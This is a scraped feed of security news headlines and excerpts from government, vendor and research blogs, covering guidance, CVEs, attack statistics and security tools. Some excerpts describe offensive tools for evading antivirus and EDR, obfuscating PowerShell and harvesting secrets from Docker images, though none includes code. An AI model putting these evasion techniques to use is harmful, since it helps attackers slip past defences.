https://www.ncsc.gov.uk/blog-post/pdns-for-schools-provide-cyber-resilience-for-more-institutions
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cyber security tips for barristers, solicitors and legal professionals
Steps to take to help reduce the likelihood of falling victim to a cyber attack.
https://www.ncsc.gov.uk/guidance/cyber-security-tips-for-barristers-solicitors-and-legal-professionals
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Using Chrome's accessibility APIs to find security bugs
Posted by Adrian Taylor, Security Engineer, Chrome Chrome's user interface (UI) code is complex, and sometimes has bugs. Are those bugs security bugs? Specifically, if a user's clicks and actions result in memory corruption, is that something that an attacker can exploit to harm that user? Our security severity guidelines say “yes, sometimes.” For example, an attacker could very likely convince a user to click an autofill prompt, but it will be much harder to convince the user to step through a whole flow of different dialogs. Even if these bugs aren't the most easily exploitable, it takes a great deal of time for our security shepherds to make these determinations. User interface bugs are often flakey (that is, not reliably reproducible). Also, even...
http://security.googleblog.com/2024/10/using-chromes-accessibility-apis-to.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Protecting Your Website From DDoS Attack
Distributed denial-of-service attacks pose an increasing threat to organizations, with even some of the largest firms suffering significant disruptions from such attacks. Attackers use botnets of compromised IoT devices to... The post Protecting Your Website From DDoS Attack appeared first on Hacker Combat.
https://www.hackercombat.com/ddos-attack/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Protect Your Devices With Free Virus Removal
Computer viruses are extremely hazardous, which is why it’s crucial to secure your devices with reliable malware removal programs. These free applications serve as your second line of defense against... The post Protect Your Devices With Free Virus Removal appeared first on Hacker Combat.
https://www.hackercombat.com/free-virus-removal/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

1-15 July 2024 Cyber Attacks Timeline
In the first timeline of July 2024 I collected 102 events (6.8 events/day) with a threat landscape dominated by ransomware...
https://www.hackmageddon.com/2024/10/10/1-15-july-2024-cyber-attacks-timeline/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Not all types of MFA are created equal...
Our updated multi-factor authentication (MFA) guidance recommends organisations use techniques that give better protection against phishing attacks.
https://www.ncsc.gov.uk/blog-post/not-all-types-mfa-created-equal
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Third Annual Ponemon Institute Report: Nearly Seven in 10 Healthcare Organizations Experienced Disruption to Patient Care Due to Cyber Attacks

https://www.proofpoint.com/us/newsroom/press-releases/third-annual-ponemon-institute-report-nearly-seven-10-healthcare
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Scalability Challenges in Privacy-Preserving Federated Learning
This post is part of a series on privacy-preserving federated learning. The series is a collaboration between NIST and the UK government's Responsible Technology Adoption Unit (RTA), previously known as the Centre for Data Ethics and Innovation. Learn more and read all the posts published to date at NIST's Privacy Engineering Collaboration Space or RTA's blog . Introduction In this post, we talk with Dr. Xiaowei Huang and Dr. Yi Dong (University of Liverpool), Dr. Mat Weldon (UK Office of National Statistics (ONS)), and Sikha Pentyala (University of Washington Tacoma), who were winners in the
https://www.nist.gov/blogs/cybersecurity-insights/scalability-challenges-privacy-preserving-federated-learning
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Implementing Zero Trust
Zero trust is an adaptable security framework designed to address today’s cyber security challenges. It employs microsegmentation and data-centric policies, verifying users, devices, applications irrespective of network location as well... The post Implementing Zero Trust appeared first on Hacker Combat.
https://www.hackercombat.com/zero-trust/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

CDK Cyber Attack
This attack had all the hallmarks of ransomware attack and targeted CDK Global systems used by auto dealerships to manage sales, finance and service operations. Due to outdated technology, ineffective... The post CDK Cyber Attack appeared first on Hacker Combat.
https://www.hackercombat.com/cdk-cyber-attack/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How to talk to board members about cyber
New guidance helps CISOs communicate with Boards to improve oversight of cyber risk.
https://www.ncsc.gov.uk/blog-post/how-to-talk-to-board-members-about-cyber
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Engaging with Boards to improve the management of cyber security risk
How to communicate more effectively with board members to improve cyber security decision making.
https://www.ncsc.gov.uk/guidance/board-level-cyber-discussions-communicating-clearly
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Effective Fuzzing: A Dav1d Case Study
Guest post by Nick Galloway, Senior Security Engineer, 20% time on Project Zero Late in 2023, while working on a 20% project with Project Zero, I found an integer overflow in the dav1d AV1 video decoder. That integer overflow leads to an out-of-bounds write to memory. Dav1d 1.4.0 patched this, and it was assigned CVE-2024-1580. After the disclosure, I received some questions about how this issue was discovered, since dav1d is already being fuzzed by at least oss-fuzz. This blog post explains what happened. It’s a useful case study in how to construct fuzzers to exercise as much code as possible. But first, some background...BackgroundDav1d Dav1d is a highly-optimized AV1 decoder. AV1 is a royalty-free video coding format developed by the Alliance...
https://googleprojectzero.blogspot.com/2024/10/effective-fuzzing-dav1d-case-study.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Pixel's Proactive Approach to Security: Addressing Vulnerabilities in Cellular Modems
Posted by Sherk Chung, Stephan Chen, Pixel team, and Roger Piqueras Jover, Ivan Lozano, Android team Pixel phones have earned a well-deserved reputation for being security-conscious. In this blog, we'll take a peek under the hood to see how Pixel mitigates common exploits on cellular basebands. Smartphones have become an integral part of our lives, but few of us think about the complex software that powers them, especially the cellular baseband – the processor on the device responsible for handling all cellular communication (such as LTE, 4G, and 5G). Most smartphones use cellular baseband processors with tight performance constraints, making security hardening difficult. Security researchers have increasingly exploited this attack vector and routinely demonstrated the possibility of...
http://security.googleblog.com/2024/10/pixel-proactive-security-cellular-modems.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Evaluating Mitigations & Vulnerabilities in Chrome
Posted by Alex Gough, Chrome Security Team The Chrome Security Team is constantly striving to make it safer to browse the web. We invest in mechanisms to make classes of security bugs impossible, mitigations that make it more difficult to exploit a security bug, and sandboxing to reduce the capability exposed by an isolated security issue. When choosing where to invest it is helpful to consider how bad actors find and exploit vulnerabilities. In this post we discuss several axes along which to evaluate the potential harm to users from exploits, and how they apply to the Chrome browser. Historically the Chrome Security Team has made major investments and driven the web to be safer. We pioneered browser sandboxing, site isolation and the migration to an encrypted web. Today we're investing...
http://security.googleblog.com/2024/10/evaluating-mitigations-vulnerabilities.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Q2 2024 Cyber Attacks Statistics
I aggregated the statistics created from the cyber attacks timelines published in Q2 2024. In this period, I collected 688 events dominated by Cyber Crime with ...
https://www.hackmageddon.com/2024/10/03/q2-2024-cyber-attacks-statistics/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Issue with NVIDIA Container Toolkit (CVE-2024-0132, CVE-2024-0133)
Publication Date: 2024/10/01 6:35 PM PDT AWS is aware of CVE-2024-0132 and CVE-2024-0133, issues affecting the NVIDIA container toolkit 1.16. At this time, the following services require customer action. If we become aware of additional impact, we will update this bulletin. Amazon Elastic Container Service (Amazon ECS) Amazon ECS has released updated ECS GPU-optimized Amazon Machine Images (AMIs) with the patched NVIDIA container toolkit v1.16.2. We recommend that ECS customers update to these AMIs (or the latest available). Additional information on the ECS-optimized AMI is available at in our "Amazon ECS-optimized Linux AMIs" developer guide. Amazon Elastic Kubernetes Service (Amazon EKS) Amazon EKS has released updated EKS GPU-optimized Amazon Machine Images...
https://aws.amazon.com/security/security-bulletins/AWS-2024-010/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cybersecurity spotlight on bug bounty researcher @imrerad
For this year's Cybersecurity Awareness Month, the GitHub Bug Bounty team is excited to feature another spotlight on a talented security researcher who participates in the GitHub Security Bug Bounty Program—@imrerad! The post Cybersecurity spotlight on bug bounty researcher @imrerad appeared first on The GitHub Blog.
https://github.blog/security/vulnerability-research/cybersecurity-spotlight-on-bug-bounty-researcher-imrerad/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Lies, damned lies, and Impact Hero (refoorest, allcolibri)
Transparency note: According to Colibri Hero, they attempted to establish a business relationship with eyeo, a company that I co-founded. I haven't been in an active role at eyeo since 2018, and I left the company entirely in 2021. Colibri Hero was only founded in 2021. My investigation here was prompted by a blog comment. Colibri Hero (also known as allcolibri) is a company with a noble mission: We want to create a world where organizations can make a positive impact on people and communities. One of the company's products is the refoorest browser extension, promising to make a positive impact on the climate by planting trees. Best of it: this costs users nothing whatsoever. According to the refoorest website: Plantation financed by our partners So the users merely need to have the...
https://palant.info/2024/10/01/lies-damned-lies-and-impact-hero-refoorest-allcolibri/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

June 2024 Cyber Attacks Statistics
After the cyber attacks timelines (part I and part II), it's time to publish the statistics for June 2024 where I collected and analyzed 230 events. During June 2024 Cyber Crime continued to lead...
https://www.hackmageddon.com/2024/10/01/june-2024-cyber-attacks-statistics/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

COM Cross-Session Activation
Once again, reading blogs and tweets from James Forshaw led me to wonder how things work. This time, I was working on DCOM for my last blog post and while reading about cross-session activation, I had trouble believing what I was reading.
https://blog.compass-security.com/2024/10/com-cross-session-activation/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

16-30 June 2024 Cyber Attacks Timeline
In the second timeline of June 2024, I collected 106 events (7.07 events/day) with a threat landscape dominated by...
https://www.hackmageddon.com/2024/09/26/16-30-june-2024-cyber-attacks-timeline/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Eliminating Memory Safety Vulnerabilities at the Source
Posted by Jeff Vander Stoep - Android team, and Alex Rebert - Security Foundations Memory safety vulnerabilities remain a pervasive threat to software security. At Google, we believe the path to eliminating this class of vulnerabilities at scale and building high-assurance software lies in Safe Coding, a secure-by-design approach that prioritizes transitioning to memory-safe languages. This post demonstrates why focusing on Safe Coding for new code quickly and counterintuitively reduces the overall security risk of a codebase, finally breaking through the stubbornly high plateau of memory safety vulnerabilities and starting an exponential decline, all while being scalable and cost-effective. We'll also share updated data on how the percentage of memory safety vulnerabilities in Android...
http://security.googleblog.com/2024/09/eliminating-memory-safety-vulnerabilities-Android.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

OSINT : User Privacy in Linux
Linux telemetry involves gathering and sending data from a Linux-based system to an external server or service. The purpose of this process is often to The post OSINT : User Privacy in Linux appeared first on Hacking Articles.
https://www.hackingarticles.in/osint-user-privacy-in-linux/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Google & Arm - Raising The Bar on GPU Security
Posted by Xuan Xing, Eugene Rodionov, Jon Bottarini, Adam Bacchus - Android Red Team; Amit Chaudhary, Lyndon Fawcett, Joseph Artgole - Arm Product Security Team Who cares about GPUs? You, me, and the entire ecosystem! GPUs (graphics processing units) are critical in delivering rich visual experiences on mobile devices. However, the GPU software and firmware stack has become a way for attackers to gain permissions and entitlements (privilege escalation) to Android-based devices. There are plenty of issues in this category that can affect all major GPU brands, for example, CVE-2023-4295, CVE-2023-21106, CVE-2021-0884, and more. Most exploitable GPU vulnerabilities are in the implementation of the GPU kernel mode modules. These modules are pieces of code that load/unload during runtime,...
http://security.googleblog.com/2024/09/google-arm-raising-bar-on-gpu-security.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

SafeLine - Serve As A Reverse Proxy To Protect Your Web Services From Attacks And Exploits
SafeLine is a self-hosted WAF(Web Application Firewall) to protect your web apps from attacks and exploits. A web application firewall helps protect web apps by filtering and monitoring HTTP traffic between a web application and the Internet. It typically protects web apps from attacks such as SQL injection, XSS, code injection, os command injection, CRLF injection, ldap injection, xpath injection, RCE, XXE, SSRF, path traversal, backdoor, bruteforce, http-flood, bot abused, among others. How It Works By deploying a WAF in front of a web application, a shield is placed between the web application and the Internet. While a proxy server protects a client machine's identity by using an intermediary, a WAF is a type of reverse-proxy, protecting the server from exposure by having clients pass...
http://www.kitploit.com/2024/09/safeline-serve-as-reverse-proxy-to.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

PolyDrop - A BYOSI (Bring-Your-Own-Script-Interpreter) Rapid Payload Deployment Toolkit
BYOSI - Bring-Your-Own-Script-Interpreter - Leveraging the abuse of trusted applications, one is able to deliver a compatible script interpreter for a Windows, Mac, or Linux system as well as malicious source code in the form of the specific script interpreter of choice. Once both the malicious source code and the trusted script interpeter are safely written to the target system, one could simply execute said source code via the trusted script interpreter. PolyDrop - Leverages thirteen scripting languages to perform the above attack. The following langues are wholly ignored by AV vendors including MS-Defender: - tcl - php - crystal - julia - golang - dart - dlang - vlang - nodejs - bun - python - fsharp - deno All of these languages were allowed to completely execute, and...
http://www.kitploit.com/2024/09/polydrop-byosi-bring-your-own-script.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Secator - The Pentester'S Swiss Knife
secator is a task and workflow runner used for security assessments. It supports dozens of well-known security tools and it is designed to improve productivity for pentesters and security researchers. Features Curated list of commands Unified input options Unified output schema CLI and library usage Distributed options with Celery Complexity from simple tasks to complex workflows Customizable Supported tools secator integrates the following tools: Name Description Category httpx Fast HTTP prober. http cariddi Fast crawler and endpoint secrets / api keys / tokens matcher. http/crawler gau Offline URL crawler (Alien Vault, The Wayback Machine, Common Crawl, URLScan). http/crawler gospider Fast web spider written in Go. http/crawler katana Next-generation crawling...
http://www.kitploit.com/2024/09/secator-pentesters-swiss-knife.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Damn-Vulnerable-Drone - An Intentionally Vulnerable Drone Hacking Simulator Based On The Popular ArduPilot/MAVLink Architecture, Providing A Realistic Environment For Hands-On Drone Hacking
The Damn Vulnerable Drone is an intentionally vulnerable drone hacking simulator based on the popular ArduPilot/MAVLink architecture, providing a realistic environment for hands-on drone hacking. About the Damn Vulnerable Drone What is the Damn Vulnerable Drone? The Damn Vulnerable Drone is a virtually simulated environment designed for offensive security professionals to safely learn and practice drone hacking techniques. It simulates real-world ArduPilot & MAVLink drone architectures and vulnerabilities, offering a hands-on experience in exploiting drone systems. Why was it built? The Damn Vulnerable Drone aims to enhance offensive security skills within a controlled environment, making it an invaluable tool for intermediate-level security professionals, pentesters, and hacking enthusiasts....
http://www.kitploit.com/2024/09/damn-vulnerable-drone-intentionally.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

File-Unpumper - Tool That Can Be Used To Trim Useless Things From A PE File Such As The Things A File Pumper Would Add
file-unpumper is a powerful command-line utility designed to clean and analyze Portable Executable (PE) files. It provides a range of features to help developers and security professionals work with PE files more effectively. Features PE Header Fixing: file-unpumper can fix and align the PE headers of a given executable file. This is particularly useful for resolving issues caused by packers or obfuscators that modify the headers. Resource Extraction: The tool can extract embedded resources from a PE file, such as icons, bitmaps, or other data resources. This can be helpful for reverse engineering or analyzing the contents of an executable. Metadata Analysis: file-unpumper provides a comprehensive analysis of the PE file's metadata, including information about the machine...
http://www.kitploit.com/2024/09/file-unpumper-tool-that-can-be-used-to.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Managing Cybersecurity and Privacy Risks in the Age of Artificial Intelligence: Launching a New Program at NIST
The rapid proliferation of Artificial Intelligence (AI) promises significant value for industry, consumers, and broader society, but as with many technologies, new risks from these advancements in AI must be managed to realize it's full potential. The NIST AI Risk Management Framework (AI RMF) was developed to manage the benefits and risks to individuals, organizations, and society associated with AI and covers a wide range of risk ranging from safety to lack of transparency and accountability. For those of us at NIST working in cybersecurity, privacy and AI, a key concern is how advancements
https://www.nist.gov/blogs/cybersecurity-insights/managing-cybersecurity-and-privacy-risks-age-artificial-intelligence
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Mass-Assigner - Simple Tool Made To Probe For Mass Assignment Vulnerability Through JSON Field Modification In HTTP Requests
Mass Assigner is a powerful tool designed to identify and exploit mass assignment vulnerabilities in web applications. It achieves this by first retrieving data from a specified request, such as fetching user profile data. Then, it systematically attempts to apply each parameter extracted from the response to a second request provided, one parameter at a time. This approach allows for the automated testing and exploitation of potential mass assignment vulnerabilities. Disclaimer This tool actively modifies server-side data. Please ensure you have proper authorization before use. Any unauthorized or illegal activity using this tool is entirely at your own risk. Features Enables the addition of custom headers within requests Offers customization of various HTTP methods for both origin and...
http://www.kitploit.com/2024/09/mass-assigner-simple-tool-made-to-probe.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

A Single IP is Scanning Intensely, and Yields a List of Malware Loaders
Overall scanning for CVEs we track is down, but one specific scanner caught our attention. We dig into what it’s doing.
https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Imperius - Make An Linux Kernel Rootkit Visible Again
A make an LKM rootkit visible again. This tool is part of research on LKM rootkits that will be launched. It involves getting the memory address of a rootkit's "show_module" function, for example, and using that to call it, adding it back to lsmod, making it possible to remove an LKM rootkit. We can obtain the function address in very simple kernels using /sys/kernel/tracing/available_filter_functions_addrs, however, it is only available from kernel 6.5x onwards. An alternative to this is to scan the kernel memory, and later add it to lsmod again, so it can be removed. So in summary, this LKM abuses the function of lkm rootkits that have the functionality to become visible again. OBS: There is another trick of removing/defusing a LKM rootkit, but it will be in the research that will...
http://www.kitploit.com/2024/09/imperius-make-linux-kernel-rootkit.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Three-Headed Potato Dog
Earlier this year, several security researchers published research about using DCOM to coerce Windows systems to authenticate to other systems. This can be misused to relay the authentication to NTLM or Kerberos, to AD CS over HTTP for instance. This sounds like a hot and complex topic. Let’s take a look back how this started […]
https://blog.compass-security.com/2024/09/three-headed-potato-dog/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

BYOSI - Evade EDR's The Simple Way, By Not Touching Any Of The API's They Hook
Evade EDR's the simple way, by not touching any of the API's they hook. Theory I've noticed that most EDRs fail to scan scripting files, treating them merely as text files. While this might be unfortunate for them, it's an opportunity for us to profit. Flashy methods like residing in memory or thread injection are heavily monitored. Without a binary signed by a valid Certificate Authority, execution is nearly impossible. Enter BYOSI (Bring Your Own Scripting Interpreter). Every scripting interpreter is signed by its creator, with each certificate being valid. Testing in a live environment revealed surprising results: a highly signatured PHP script from this repository not only ran on systems monitored by CrowdStrike and Trellix but also established an external connection without triggering...
http://www.kitploit.com/2024/09/byosi-evade-edrs-simple-way-by-not.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Psobf - PowerShell Obfuscator
Tool for obfuscating PowerShell scripts written in Go. The main objective of this program is to obfuscate PowerShell code to make its analysis and detection more difficult. The script offers 5 levels of obfuscation, from basic obfuscation to script fragmentation. This allows users to tailor the obfuscation level to their specific needs../psobf -h ██████╗ ███████╗ ██████╗ ██████╗ ███████╗ ██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝ ██████╔╝███████╗██║ ██║██████╔╝█████╗ ██╔═══╝ ╚════██║██║ ██║██╔══██╗██╔══╝...
http://www.kitploit.com/2024/09/psobf-powershell-obfuscator.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

CloudImposer
Google Cloud Composer is a managed service for Apache Airflow. Tenable discovered that the Cloud Composer package was vulnerable to dependency confusion, which could have allowed attackers to inject malicious code when the package was compiled from source. This could have led to remote code execution on machines running Cloud Composer, which include various other GCP services as well as internal servers at Google. The dependency confusion stemmed from Google's risky recommendation in their documentation to use the --extra-index-url argument when installing private Python packages. Following disclosure, Google fixed the dependency confusion vulnerability and also updated their documentation.
https://www.cloudvulndb.org/cloudimposer-gcp
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Document AI data exfiltration
The Document AI service unintentionally allows users to read any Cloud Storage object in the same project, in a way that isn't properly documented. The Document AI service agent is auto-assigned with excessive permissions, allowing it to access all objects from Cloud Storage buckets in the same project. Malicious actors can exploit this to exfiltrate data from Cloud Storage by indirectly leveraging the service agent's permissions. This vulnerability is an instance of transitive access abuse, a class of security flaw where unauthorized access is gained indirectly through a trusted intermediary.
https://www.cloudvulndb.org/gcp-document-ai-data-exfil
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ModTracer - ModTracer Finds Hidden Linux Kernel Rootkits And Then Make Visible Again
ModTracer Finds Hidden Linux Kernel Rootkits and then make visible again.Another way to make an LKM visible is using the imperius trick: https://github.com/MatheuZSecurity/ImperiusDownload ModTracer
http://www.kitploit.com/2024/09/modtracer-modtracer-finds-hidden-linux.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

DockerSpy - DockerSpy Searches For Images On Docker Hub And Extracts Sensitive Information Such As Authentication Secrets, Private Keys, And More
DockerSpy searches for images on Docker Hub and extracts sensitive information such as authentication secrets, private keys, and more. What is Docker? Docker is an open-source platform that automates the deployment, scaling, and management of applications using containerization technology. Containers allow developers to package an application and its dependencies into a single, portable unit that can run consistently across various computing environments. Docker simplifies the development and deployment process by ensuring that applications run the same way regardless of where they are deployed. About Docker Hub Docker Hub is a cloud-based repository where developers can store, share, and distribute container images. It serves as the largest library of container images, providing access...
http://www.kitploit.com/2024/09/dockerspy-dockerspy-searches-for-images.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

A new path for Kyber on the web
Posted by David Adrian, David Benjamin, Bob Beck & Devon O'Brien, Chrome Team We previously posted about experimenting with a hybrid post-quantum key exchange, and enabling it for 100% of Chrome Desktop clients. The hybrid key exchange used both the pre-quantum X25519 algorithm, and the new post-quantum algorithm Kyber. At the time, the NIST standardization process for Kyber had not yet finished. Since then, the Kyber algorithm has been standardized with minor technical changes and renamed to the Module Lattice Key Encapsulation Mechanism (ML-KEM). We have implemented ML-KEM in Google's cryptography library, BoringSSL, which allows for it to be deployed and utilized by services that depend on this library. The changes to the final version of ML-KEM make it incompatible with the previously...
http://security.googleblog.com/2024/09/a-new-path-for-kyber-on-web.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

1-15 June 2024 Cyber Attacks Timeline
In the first timeline of June 2024 I collected 124 events (8.27 events/day) with a threat landscape dominated by...
https://www.hackmageddon.com/2024/09/12/1-15-june-2024-cyber-attacks-timeline/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

A Detailed Guide on Feroxbuster
Feroxbuster is a robust tool designed to identify directories and files on web servers using brute-force techniques. It is frequently utilized in penetration testing and The post A Detailed Guide on Feroxbuster appeared first on Hacking Articles.
https://www.hackingarticles.in/a-detailed-guide-on-feroxbuster/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

5 Ways to Mitigate Risk in Cybersecurity
Cybersecurity refers to practices designed to defend computers, mobile devices, electronic data storage platforms and networks against attacks such as ransomware extortion and data breaches. Preventative techniques are key in... The post 5 Ways to Mitigate Risk in Cybersecurity appeared first on Hacker Combat.
https://www.hackercombat.com/five-ways-to-mitigate-risk-in-cybersecurity/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

What is Malware
Malware refers to any form of malicious software which aims to disrupt, harm or steal private information for criminal use. Furthermore, malware can mine cryptocurrency for cybercriminals as an additional... The post What is Malware appeared first on Hacker Combat.
https://www.hackercombat.com/malware/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

From Classroom into Bug Bounty: Investigating Motivational Factors Among Swiss Students
Bug bounty programs have evolved into a critical element of modern cybersecurity. In this post, we give some answers to how bug bounty programs can attract students as hunters.
https://blog.compass-security.com/2024/09/from-classroom-into-bug-bounty-investigating-motivational-factors-among-swiss-students/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How to Identify and Stop Scrapers
Fighting sophisticated scrapers requires advanced detection methods. Discover the techniques needed to identify and manage these hidden threats outlined in our investigation.
https://www.f5.com/labs/articles/threat-intelligence/how-to-identify-and-stop-scrapers
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ClamAV 1.4.1, 1.3.2, 1.0.7, and 0.103.12 security patch versions published
Today, we are publishing the 1.4.1, 1.3.2, 1.0.7, and 0.103.12 security patch versions. The release files for the patch versions are available for download on the ClamAV downloads page, on the GitHub Release page, and (with exception to 0.103.12) through Docker Hub.The images on Docker Hub may not be immediately available on release day.Continue reading to learn what changed in each version.1.4.1ClamAV 1.4.1 is a critical patch release with the following fixes:CVE-2024-20506: Changed the logging module to disable following symlinks on Linux and Unix systems so as to prevent an attacker with existing access to the 'clamd' or 'freshclam' services from using a symlink to corrupt system files.This issue affects all currently supported versions. It will be fixed in:1.4.11.3.21.0.70.103.12Thank...
http://blog.clamav.net/2024/09/clamav-141-132-107-and-010312-security.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Learning, Sharing, and Exploring with NIST's New Human-Centered Cybersecurity Community of Interest
Human-centered cybersecurity (also known as ‘usable security') involves the social, organizational, and technological influences on people's understanding of and interactions with cybersecurity. By taking a human-centered cybersecurity (HCC) approach, we can both improve people's cybersecurity experiences and achieve better cybersecurity outcomes, which is so important in today's digitally interconnected world. At NIST, we understand the value of making connections, listening, and interactivity. We also understand that researchers and practitioners want to hear directly from each other—and
https://www.nist.gov/blogs/cybersecurity-insights/learning-sharing-and-exploring-nists-new-human-centered-cybersecurity
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

May 2024 Cyber Attacks Statistics
After the cyber attacks timelines (part I and part II), it's time to publish the statistics for May 2024 where I collected and analyzed 242 events...
https://www.hackmageddon.com/2024/08/29/may-2024-cyber-attacks-statistics/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

CVE-2024-38063 - Remotely Exploiting The Kernel Via IPv6
Performing a root cause analysis & building proof-of-concept for CVE-2024-38063, a CVSS 9.8 Vulnerability In the Windows Kernel IPv6 Parser
https://malwaretech.com/2024/08/exploiting-CVE-2024-38063.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

MSSQL for Pentester: NetExec
NetExec (nxc) is a powerful network exploitation tool developed as a modern successor to CrackMapExec (CME), which was widely used by penetration testers and red The post MSSQL for Pentester: NetExec appeared first on Hacking Articles.
https://www.hackingarticles.in/mssql-for-pentester-netexec/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Scanning for CVE-2017-9841 Drops Precipitously
Last issue, we observed huge amounts of scanning for the rather old CVE-2017-9841, an RCE in PHPUnit. This time it’s fallen off nearly as sharply. We look into why!
https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-july-2024
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

A Patchdiffing Journey – TP-Link Omada
Last year we participated in the Pwn2Own 2023 Toronto competition and successfully exploited the Synology BC500 camera. The DEVCORE Internship Program team managed to exploit a bug in the TP-Link Omada Gigabit VPN Router. So I was naturally curious and wanted to figure out how difficult it would be to recreate that exploit having access only to a high-level bug description and the firmware.
https://blog.compass-security.com/2024/08/a-patchdiffing-journey-tp-link-omada/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Copilot Studio information disclosure via SSRF

https://www.cloudvulndb.org/copilot-studio-infoleak-ssrf
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ClamAV 1.4.0 feature release and ClamAV bytecode compiler 1.4.0 release
The ClamAV 1.4.0 feature release is now stable. We encourage everyone to download the latest version now from the ClamAV downloads page, on the GitHub Release page, and through Docker Hub*:Alpine-based imagesDebian-based multi-arch images*The Docker images are built on release day and will be made available when they are ready.We are also publishing ClamAV bytecode compiler version 1.4.0.The ClamAV bytecode compiler release files are available for download on the GitHub Release page and through Docker Hub.ClamAV platform support changesWe will no longer provide Linux 32-bit packages. With RHEL 7 reaching end-of-life, we had to upgrade our build hosts and selected Alma Linux 8. Alma Linux does not provide 32-bit images. ClamAV users on 32-bit platforms can still build from source.We now provide...
http://blog.clamav.net/2024/08/clamav-140-feature-release-and-clamav.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

CryptoCore: Unmasking the Sophisticated Cryptocurrency Scam Operations
As digital currencies have grown, so have cryptocurrency scams, posing significant user risks. The rise of AI and deepfake technology has intensified scams exploiting famous personalities and events by creating realistic fake videos. Platforms like X and YouTube have been especially targeted, with scammers hijacking high-profile accounts to distribute fraudulent content. This report delves into the CryptoCore group's complex scam operations, analyzing their use of deepfakes, hijacked accounts, and fraudulent websites to deceive victims and profit millions of dollars. The post CryptoCore: Unmasking the Sophisticated Cryptocurrency Scam Operations appeared first on Avast Threat Labs.
https://decoded.avast.io/martinchlumecky1/cryptocore-unmasking-the-sophisticated-cryptocurrency-scam-operations/?utm_source=rss&utm_medium=rss&utm_campaign=cryptocore-unmasking-the-sophisticated-cryptocurrency-scam-operations
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Azue Health privilege escalation via SSRF

https://www.cloudvulndb.org/azure-health-pe-ssrf
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ClamAV 0.103 LTS End of Life Announcement
The ClamAV 0.103 LTS release is nearing end-of-life (EOL) with regards to security vulnerability fix support from our team. This end of life date will be Sept. 14, 2024. ClamAV 0.103 users will be able to update signatures from the official database mirror for an additional one year after the EOL date. After Sept. 14, 2025, we may block ClamAV 0.103 from downloading signature updates. We recommend that users update to the newest LTS release, ClamAV 1.0.6. For users that want to upgrade to the newest non-LTS release, use ClamAV 1.3.1. The most recent version of ClamAV can be found here: https://www.clamav.net/downloads The following is a list of major changes available to users in the newest versions of ClamAV. Since ClamAV 0.103, ClamAV 1.0 LTS adds: ·                     A...
http://blog.clamav.net/2024/08/clamav-0103-lts-end-of-life-announcement.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

60 Hurts per Second – How We Got Access to Enough Solar Power to Run the United States
The electricity grid – the buzzing, crackling marvel that supplies the lifeblood of modernity - is by far the largest structure humanity ever built. It's so big, in fact, that few people even notice it, like a fish can't see the ocean. Until the grid goes down, that is. Then, like the fish dangling from the angler's hook, we see our vulnerability. Modernity dissolves into a sudden silence, followed by the repeated flick of a light switch, and a howl of panic at the prospect of missed appointmen
https://www.bitdefender.com/en-us/blog/labs/60-hurts-per-second-how-we-got-access-to-enough-solar-power-to-run-the-united-states/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

